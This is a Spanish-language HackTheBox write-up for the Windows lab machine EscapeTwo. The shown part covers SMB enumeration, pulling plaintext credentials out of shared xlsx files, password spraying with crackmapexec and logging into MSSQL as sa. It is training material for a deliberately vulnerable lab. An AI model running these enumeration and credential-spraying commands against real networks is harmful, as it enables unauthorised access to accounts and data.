This page looks best with JavaScript enabled

HackTheBox - EscapeTwo

EscapeTwo expone archivos con credenciales por el servicio de SMB que permitieron la autenticacion por MSSQL y posteriormente a un primer usuario. Se realizo la explotacion de WriteOwner para el control y acceso sobre un segundo usuario. Finalmente se descubrio una plantilla vulnerable a ESC4 lo que permitio la escalada de privilegios.

Nombre EscapeTwo box_img_maker
OS

Windows

Puntos 20
Dificultad Easy
Fecha de Salida 2025-01-11
IP 10.10.11.51
Maker

ruycr4ft


Llo0zy

Rated
{
    "type": "bar",
    "data":  {
        "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"],
        "datasets": [{
            "label": "User Rated Difficulty",
            "data": [241, 372, 1394, 1237, 770, 441, 327, 143, 43, 105],
            "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"]
        }]
    },
    "options": {
        "scales": {
          "xAxes": [{"display": false}],
          "yAxes": [{"display": false}]
        },
        "legend": {"labels": {"fontColor": "white"}},
        "responsive": true
      }
}

Machine Information: EscapeTwo

La descripcion de la maquina emula una situacion “real” de un pentest, proporcionando credenciales.

As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su

Recon

nmap

nmap muestra multiples puertos abiertos: http (80) y ssh (22).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
# Nmap 7.95 scan initiated Wed Jan 22 00:58:17 2025 as: /usr/lib/nmap/nmap --privileged -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,47001,49664,49665,49666,49668,49683,49687,49692,49716,49725,49794 -sV -sC -oN nmap_scan 10.10.11.51
Nmap scan report for 10.10.11.51
Host is up (0.085s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-22 05:58:24Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-22T06:00:01+00:00; +1s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-22T06:00:00+00:00; 0s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-01-22T06:00:01+00:00; +1s from scanner time.
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-22T04:04:39
|_Not valid after:  2055-01-22T04:04:39
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-22T06:00:01+00:00; +1s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-22T06:00:00+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49687/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49716/tcp open  msrpc         Microsoft Windows RPC
49725/tcp open  msrpc         Microsoft Windows RPC
49794/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-22T05:59:21
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 22 01:00:02 2025 -- 1 IP address (1 host up) scanned in 104.98 seconds

SMB

El servicio samba nos muestra los recursos compartidos a los que rose tiene acceso.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
❯ smbmap -H 10.10.11.51 -u rose -p "KxEPkKe6R8su"

[...] snip [...]

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.10.11.51:445	Name: 10.10.11.51         	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	Accounting Department                             	READ ONLY	
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY	
[*] Closed 1 connections                                                

Files

Enumeramos los recursos con smbmap y la flag -r. Observamos archivos xlsx en uno de los recursos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
❯ smbmap -H 10.10.11.51 -u rose -p "KxEPkKe6R8su" -r

[...] snip [...]

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.10.11.51:445	Name: 10.10.11.51         	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	Accounting Department                             	READ ONLY	
	./Accounting Department
	dr--r--r--                0 Sun Jun  9 07:11:31 2024	.
	dr--r--r--                0 Sun Jun  9 07:11:31 2024	..
	fr--r--r--            10217 Sun Jun  9 07:11:31 2024	accounting_2024.xlsx
	fr--r--r--             6780 Sun Jun  9 07:11:31 2024	accounts.xlsx
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	./IPC$
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	InitShutdown
	fr--r--r--                4 Sun Dec 31 19:03:58 1600	lsass
	fr--r--r--                4 Sun Dec 31 19:03:58 1600	ntsvcs
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	scerpc
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-388-0
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	epmapper
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-1f0-0
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	LSM_API_service
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	eventlog
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-4a0-0
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	atsvc
	fr--r--r--                4 Sun Dec 31 19:03:58 1600	wkssvc
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-280-0
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-280-1
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-62c-0
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	RpcProxy\49683
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	b0b152dd459378d7
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	RpcProxy\593
	fr--r--r--                4 Sun Dec 31 19:03:58 1600	srvsvc
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	netdfs
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	tapsrv
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	vgauth-service
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	ROUTER
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-260-0
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	W32TIME_ALT
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-ab0-0
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	cert
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-a64-0
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	msfte\MSSQL15.SQLEXPRESSFba4b0bbdf1634f4ae2f83d9fc48e7415f9476a0fFTEtoFDAdmin
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	msfte\MSSQL15.SQLEXPRESSFba4b0bbdf1634f4ae2f83d9fc48e7415f9476a0fFDReq
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	msfte\MSSQL15.SQLEXPRESSFba4b0bbdf1634f4ae2f83d9fc48e7415f9476a0fCBStatus
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	SQLLocal\SQLEXPRESS
	fr--r--r--                2 Sun Dec 31 19:03:58 1600	MSSQL$SQLEXPRESS\sql\query
	fr--r--r--                2 Sun Dec 31 19:03:58 1600	sqlsatellitelaunchSQLEXPRESS
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	Winsock2\CatalogChangeListener-acc-0
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	PSHost.133819930427984603.3552.DefaultAppDomain.wsmprovhost
	fr--r--r--                1 Sun Dec 31 19:03:58 1600	PSHost.133819974666309101.6464.DefaultAppDomain.wsmprovhost
	fr--r--r--                3 Sun Dec 31 19:03:58 1600	winreg
	NETLOGON                                          	READ ONLY	Logon server share 
	./NETLOGON
	dr--r--r--                0 Sat Jun  8 12:39:53 2024	.
	dr--r--r--                0 Sat Jun  8 12:39:53 2024	..
	SYSVOL                                            	READ ONLY	Logon server share 
	./SYSVOL
	dr--r--r--                0 Sat Jun  8 12:39:53 2024	.
	dr--r--r--                0 Sat Jun  8 12:39:53 2024	..
	dr--r--r--                0 Sat Jun  8 12:39:53 2024	sequel.htb
	Users                                             	READ ONLY	
	./Users
	dw--w--w--                0 Sun Jun  9 09:42:11 2024	.
	dw--w--w--                0 Sun Jun  9 09:42:11 2024	..
	dw--w--w--                0 Sun Jun  9 07:17:29 2024	Default
	fr--r--r--              174 Sat Jun  8 22:27:10 2024	desktop.ini
[*] Closed 1 connections                                                                                                     

Users

crackmapexec nos muestra los usuarios de la maquina, creamos un wordlist con estos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
❯ crackmapexec smb 10.10.11.51 -u rose -p "KxEPkKe6R8su" --users
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su 
SMB         10.10.11.51     445    DC01             [+] Enumerated domain user(s)
SMB         10.10.11.51     445    DC01             sequel.htb\ca_svc                         badpwdcount: 0 desc: 
SMB         10.10.11.51     445    DC01             sequel.htb\rose                           badpwdcount: 0 desc: 
SMB         10.10.11.51     445    DC01             sequel.htb\sql_svc                        badpwdcount: 0 desc: 
SMB         10.10.11.51     445    DC01             sequel.htb\oscar                          badpwdcount: 2 desc: 
SMB         10.10.11.51     445    DC01             sequel.htb\ryan                           badpwdcount: 0 desc: 
SMB         10.10.11.51     445    DC01             sequel.htb\michael                        badpwdcount: 6 desc: 
SMB         10.10.11.51     445    DC01             sequel.htb\krbtgt                         badpwdcount: 6 desc: Key Distribution Center Service Account
SMB         10.10.11.51     445    DC01             sequel.htb\Guest                          badpwdcount: 6 desc: Built-in account for guest access to the computer/domain
SMB         10.10.11.51     445    DC01             sequel.htb\Administrator                  badpwdcount: 6 desc: Built-in account for administering the computer/domain
❯ crackmapexec smb 10.10.11.51 -u rose -p "KxEPkKe6R8su" --users |cut -d "\\" -f2 | cut -d " " -f1 > users.txt
❯ nano users.txt

Analyzing Files

Descargamos los archivos del recurso “Accounting Department”.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
smb: \> ls
  .                                   D        0  Sun Jun  9 06:52:21 2024
  ..                                  D        0  Sun Jun  9 06:52:21 2024
  accounting_2024.xlsx                A    10217  Sun Jun  9 06:14:49 2024
  accounts.xlsx                       A     6780  Sun Jun  9 06:52:07 2024

		6367231 blocks of size 4096. 925222 blocks available
smb: \> get accounts.xlsx 
getting file \accounts.xlsx of size 6780 as accounts.xlsx (25.5 KiloBytes/sec) (average 25.5 KiloBytes/sec)
smb: \> get accounting_2024.xlsx 
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (38.5 KiloBytes/sec) (average 32.0 KiloBytes/sec)
smb: \> quit
❯ file *.xlsx
accounting_2024.xlsx: Zip archive data, made by v4.5, extract using at least v2.0, last modified, last modified Sun, Jan 01 1980 00:00:00, uncompressed size 1284, method=deflate
accounts.xlsx:        Zip archive data, made by v2.0, extract using at least v2.0, last modified, last modified Sun, Jun 09 2024 10:47:44, uncompressed size 681, method=deflate

Accounts

Despues de obtener multiples errores en LibreOffice y otras herramientas para convertiro xlsx a csv, extrajimos el contenido utilizando zip.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
❯ unzip accounts.xlsx -d accounts
Archive:  accounts.xlsx
file #1:  bad zipfile offset (local header sig):  0
  inflating: accounts/xl/workbook.xml  
  inflating: accounts/xl/theme/theme1.xml  
  inflating: accounts/xl/styles.xml  
  inflating: accounts/xl/worksheets/_rels/sheet1.xml.rels  
  inflating: accounts/xl/worksheets/sheet1.xml  
  inflating: accounts/xl/sharedStrings.xml  
  inflating: accounts/_rels/.rels    
  inflating: accounts/docProps/core.xml  
  inflating: accounts/docProps/app.xml  
  inflating: accounts/docProps/custom.xml  
  inflating: accounts/[Content_Types].xml  
cd accounts
❯ tree .
.
├── [Content_Types].xml
├── docProps
│   ├── app.xml
│   ├── core.xml
│   └── custom.xml
├── _rels
└── xl
    ├── sharedStrings.xml
    ├── styles.xml
    ├── theme
    │   └── theme1.xml
    ├── workbook.xml
    └── worksheets
        ├── _rels
        │   └── sheet1.xml.rels
        └── sheet1.xml

7 directories, 10 files

La informacion del archivo nos muestra la version y software utilizado en este caso LibreOffice/24.2.4.2, no se muestra el autor del archivo.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
❯ ll
.rw-rw-r-- kali kali 441 B Sun Jun  9 10:47:44 2024  app.xml
.rw-rw-r-- kali kali 731 B Sun Jun  9 10:47:44 2024  core.xml
.rw-rw-r-- kali kali 241 B Sun Jun  9 10:47:44 2024  custom.xml
❯ xmlstarlet fo app.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template/>
  <TotalTime>0</TotalTime>
  <Application>LibreOffice/24.2.4.2$Linux_X86_64 LibreOffice_project/51a6219feb6075d9a4c46691dcfe0cd9c4fff3c2</Application>
  <AppVersion>15.0000</AppVersion>
</Properties>
❯ xmlstarlet fo core.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-09T04:22:05Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-09T06:47:44Z</dcterms:modified>
  <cp:revision>2</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
❯ xmlstarlet fo custom.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>

En sharedStrings encontramos una lista de usuarios y contrasenas, creamos un wordlist con estas.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
❯ xmllint --xpath "//*[local-name()='t']/text()" sharedStrings.xml
First Name
Last Name
Email
Username
Password
Angela
Martin
angela@sequel.htb
angela
0fwz7Q4mSpurIt99
Oscar
Martinez
oscar@sequel.htb
oscar
86LxLBMgEWaKUnBG
Kevin
Malone
kevin@sequel.htb
kevin
Md9Wlq1E5bZnVDVo
NULL
sa@sequel.htb
sa
MSSQLP@ssw0rd!
❯ xmllint --xpath "//*[local-name()='t']/text()" sharedStrings.xml > ../../userpass_accounts_file.txt
❯ nano ../../userpass_accounts_file.txt

Accounting

En el caso de accounting_2024.xlsx se muestra un archivo de configuracion de una impresaora printerSettings1.bin.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
❯ unzip accounting_2024.xlsx -d accounting
Archive:  accounting_2024.xlsx
file #1:  bad zipfile offset (local header sig):  0
  inflating: accounting/_rels/.rels  
  inflating: accounting/xl/workbook.xml  
  inflating: accounting/xl/_rels/workbook.xml.rels  
  inflating: accounting/xl/worksheets/sheet1.xml  
  inflating: accounting/xl/theme/theme1.xml  
  inflating: accounting/xl/styles.xml  
  inflating: accounting/xl/sharedStrings.xml  
  inflating: accounting/xl/worksheets/_rels/sheet1.xml.rels  
  inflating: accounting/xl/printerSettings/printerSettings1.bin  
  inflating: accounting/docProps/core.xml  
  inflating: accounting/docProps/app.xml  
cd accounting
❯ tree .
.
├── docProps
│   ├── app.xml
│   └── core.xml
├── _rels
└── xl
    ├── printerSettings
    │   └── printerSettings1.bin
    ├── _rels
    │   └── workbook.xml.rels
    ├── sharedStrings.xml
    ├── styles.xml
    ├── theme
    │   └── theme1.xml
    ├── workbook.xml
    └── worksheets
        ├── _rels
        │   └── sheet1.xml.rels
        └── sheet1.xml

9 directories, 10 files

En este caso, el archivo fue creado con Microsoft Excel y se muestra un nombre completo del usuario que modifico el archivo.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
❯ ll
.rw-rw-r-- kali kali 792 B Tue Jan  1 00:00:00 1980  app.xml
.rw-rw-r-- kali kali 614 B Tue Jan  1 00:00:00 1980  core.xml
❯ xmlstarlet fo app.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Application>Microsoft Excel</Application>
  <DocSecurity>0</DocSecurity>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Hojas de cálculo</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr>Sheet1</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <SharedDoc>false</SharedDoc>
  <HyperlinksChanged>false</HyperlinksChanged>
  <AppVersion>16.0300</AppVersion>
</Properties>
❯ xmlstarlet fo core.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <dc:creator/>
  <cp:lastModifiedBy>Ruy Alonso Fernández</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-09T09:44:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-09T09:48:57Z</dcterms:modified>
</cp:coreProperties>

Los datos que contiene parecen ser informacion de facturas.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
❯ xmlstarlet fo sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="28" uniqueCount="27">
  <si>
    <t>Date</t>
  </si>
  <si>
    <t>Invoice Number</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Amount</t>
  </si>
  <si>
    <t>Due Date</t>
  </si>
  <si>
    <t>Status</t>
  </si>
  <si>
    <t>Notes</t>
  </si>
  <si>
    <t>1001</t>
  </si>
  <si>
    <t>1002</t>
  </si>
  <si>
    <t>1003</t>
  </si>
  <si>
    <t>Office Supplies</t>
  </si>
  <si>
    <t>Consulting</t>
  </si>
  <si>
    <t>Software</t>
  </si>
  <si>
    <t>01/15/2024</t>
  </si>
  <si>
    <t>01/30/2024</t>
  </si>
  <si>
    <t>02/05/2024</t>
  </si>
  <si>
    <t>Paid</t>
  </si>
  <si>
    <t>Unpaid</t>
  </si>
  <si>
    <t>Follow up</t>
  </si>
  <si>
    <t>23/08/2024</t>
  </si>
  <si>
    <t>150$</t>
  </si>
  <si>
    <t>500$</t>
  </si>
  <si>
    <t>300$</t>
  </si>
  <si>
    <t>Vendor</t>
  </si>
  <si>
    <t>Dunder Mifflin</t>
  </si>
  <si>
    <t>Business Consultancy</t>
  </si>
  <si>
    <t>Windows Server License</t>
  </si>
</sst>

Credentials

Creamos un nuevo wordlist con todos los usuarios y contrasenas encontrados, utilizamos crackmapexec para realizar fuerza bruta por smb, encontramos un par de credenciales para este servicio.

1
2
3
4
❯ crackmapexec smb 10.10.11.51 -u allusers.txt -p allusers.txt --continue-on-success | grep +
SMB                      10.10.11.51     445    DC01             [+] sequel.htb\oscar:86LxLBMgEWaKUnBG 
SMB                      10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su 

MSSQL - Access

Aparentemente uno de los pares de credenciales es aceptado por mssql, sin embargo crackmapexec muestra algun tipo de “error”.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
❯ crackmapexec mssql sequel.htb -u allusers.txt -p "MSSQLP@ssw0rd\!" --port 1433 --local-auth
MSSQL       sequel.htb      1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:DC01)
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Angela'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Martin'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'angela'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user '0fwz7Q4mSpurIt99'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Martinez'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user '86LxLBMgEWaKUnBG'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Kevin'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Malone'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'kevin'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Md9Wlq1E5bZnVDVo'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'NULL'.
MSSQL       sequel.htb      1433   DC01             [-] DC01\sa:MSSQLP@ssw0rd! name 'logging' is not defined
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'MSSQLP@ssw0rd!'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'ca_svc'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'rose'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'sql_svc'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'oscar'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'ryan'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'michael'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'krbtgt'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Guest'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Administrator'.
MSSQL       sequel.htb      1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'KxEPkKe6R8su'.
❯ crackmapexec mssql sequel.htb -u "sa" -p "MSSQLP@ssw0rd\!" --port 1433 --local-auth
MSSQL       sequel.htb      1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:DC01)
MSSQL       sequel.htb      1433   DC01             [-] DC01\sa:MSSQLP@ssw0rd! name 'logging' is not defined

Confirmamos que estas credenciales son aceptadas tras ejecutar impacket-mssqlclient.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
❯ impacket-mssqlclient -dc-ip 10.10.11.51 -p 1433 sa:"MSSQLP@ssw0rd\!"@sequel.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
